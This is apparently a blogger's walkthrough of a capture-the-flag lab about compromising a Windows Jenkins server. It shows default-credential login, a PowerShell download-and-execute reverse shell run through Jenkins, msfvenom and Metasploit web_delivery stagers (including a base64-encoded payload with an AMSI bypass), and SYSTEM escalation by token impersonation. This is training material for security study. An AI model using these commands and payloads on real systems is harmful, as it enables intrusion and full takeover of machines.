In this room, we'll learn how to exploit a common misconfiguration on a widely used automation server(Jenkins - This tool is used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they made changes to it). After which, we'll use an interesting privilege escalation method to get full system access.
Since this is a Windows application, we'll be using Nishang to gain initial access. The repository contains a useful set of scripts for initial access, enumeration and privilege escalation. In this case, we'll be using the reverse shell scripts.
Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.
How many ports are open? (TCP only)
nmap -Pn -sV -O 10.10.205.78
Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-24 12:43 GMT
Nmap scan report for ip-10-10-205-78.eu-west-1.compute.internal (10.10.205.78)
Host is up (0.0014s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
3389/tcp open tcpwrapped
8080/tcp open http Jetty 9.4.z-SNAPSHOT
MAC Address: 02:8F:DD:66:F5:F9 (Unknown)
What is the username and password for the login panel? (in the format username:password)
Well... this is embarrassing... the default credentials work on this [REDACTED]:[REDACTED].
Now that we're in we're going to poke around for a bit. The instructions for this task are as follows:
Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it:
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-portYou first need to download the Powershell script and make it available for the server to download. You can do this by creating an http server with python:
python3 -m http.serverWhat I'm seeing is a project workspace that has build in it. When we click on Build Executor Status, we have a script console we can use.
After testing some simple commands like whoami, I see we can use the second example there to run commands. We'll use the PowerShell command they offered us in the write up.
This wasn't really working. I could see it downloading the file but not making the connection. I checked into the configure option under the project.
It looks like we can put a command in the build area too.
Then build the project.
I could see that the build failed but now I can click on the project and go into the console output and see where it's failing.
Ok so after a BUNCH of playing it turns out the link that was provided for the shell script itself isn't good. I had to download the entire nishang set and then use the PowerShell file that was in the raw download... silly. But that gave us the reverse shell pretty easy. We then just change directories to the users desktop and grab the user.txt file.
Switching Shells: What is the final size of the exe payload that you generated?
This one's pretty straightforward, just follow the instructions and the answer's right there when you make the executable.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.123.248 LPORT=1234 -f exe -o shell-name.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: [REDACTED] bytes
Saved as: shell-name.exeThe only thing I noticed was doing the meterpreter shell should be done manually instead of doing it all on one line
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [your-ip]
set LPORT [listening-port]
runAlso, when doing the service start you might need to prefix it with the powershell command
powershell Start-Process "shell-name.exe"I couldn't get a connection back. It was frustrating. After what seemed like forever trying to find a suitable package to deploy, I came across this: https://www.offsec.com/metasploit-unleashed/web-delivery/ which talked about a meterpreter package called web delivery
use exploit/multi/script/web_deliveryIf you do options you'll see everything we want to set, be sure to change the target o powershell (2) - since that's what we have access to run
set LHOST [your-ip]
set LPORT [listening-port]
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_tcpWhen you run it, it will give you some code to run on the compromised box we're working on.
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.110.253:4444
msf6 exploit(multi/script/web_delivery) > [*] Using URL: http://10.10.110.253:8080/WAhJzdGE
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABlAGEAcQBsAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAGUAYQBxAGwALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABlAGEAcQBsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQAxADAALgAyADUAMwA6ADgAMAA4ADAALwBXAEEAaABKAHoAZABHAEUALwA2AEsAMgBUAEMAVgBJAEcAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEAMQAwAC4AMgA1ADMAOgA4ADAAOAAwAC8AVwBBAGgASgB6AGQARwBFACcAKQApADsAOnce you copy and paste that code into the PC we're attempting to hack into, it will generate a connection back to us and you'll see it waiting on a prompt for a while. I scrolled down and it brought be back to a msf prompt.
[*] 10.10.239.5 web_delivery - Delivering AMSI Bypass (1387 bytes)
[*] 10.10.239.5 web_delivery - Delivering Payload (3516 bytes)
[*] Sending stage (175686 bytes) to 10.10.239.5
[*] Meterpreter session 1 opened (10.10.110.253:4444 -> 10.10.239.5:49206) at 2023-11-27 13:08:51 +0000
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows alfred\bruce @ ALFRED 10.10.110.253:4444 -> 10.10.239.5:49
206 (10.10.239.5)
msf6 exploit(multi/script/web_delivery) > From there we can check our open sessions
[*] 10.10.239.5 web_delivery - Delivering AMSI Bypass (1387 bytes)
[*] 10.10.239.5 web_delivery - Delivering Payload (3516 bytes)
[*] Sending stage (175686 bytes) to 10.10.239.5
[*] Meterpreter session 1 opened (10.10.110.253:4444 -> 10.10.239.5:49206) at 2023-11-27 13:08:51 +0000
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows alfred\bruce @ ALFRED 10.10.110.253:4444 -> 10.10.239.5:49
206 (10.10.239.5)
msf6 exploit(multi/script/web_delivery) > Type the number of the session you want access to to get the meterpreter shell we've been looking for.
msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...
meterpreter > dir
No entries exist in C:\Program Files (x86)\Jenkins\workspace\projectNow you'll notice you won't be able to run some commands with this shell unfortunately - this is because we're using a shell that's basically a web shell.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEMWe'll need to move into something with higher privileges. If we do a ps command we can see all the process, their PIDs and who owns that PID.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
< snip... >
2988 668 TrustedInstalle x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\Truste
r.exe dInstaller.exe
3008 668 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVI C:\Windows\System32\sppsvc.
CE exe
3024 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost
.exe
3064 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost
.exeThen we migrate into that new PID with SYSTEM privileges.
migrate 3064Now, when we run our command we get the output without errors. We're able to get another question as well
What is the output when you run the getuid command?
meterpreter > impersonate_token "BUILTIN\Administrators"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMFor the final question we simply browse to the file in question and use the 'cat' command to show the contents of the file.
Comments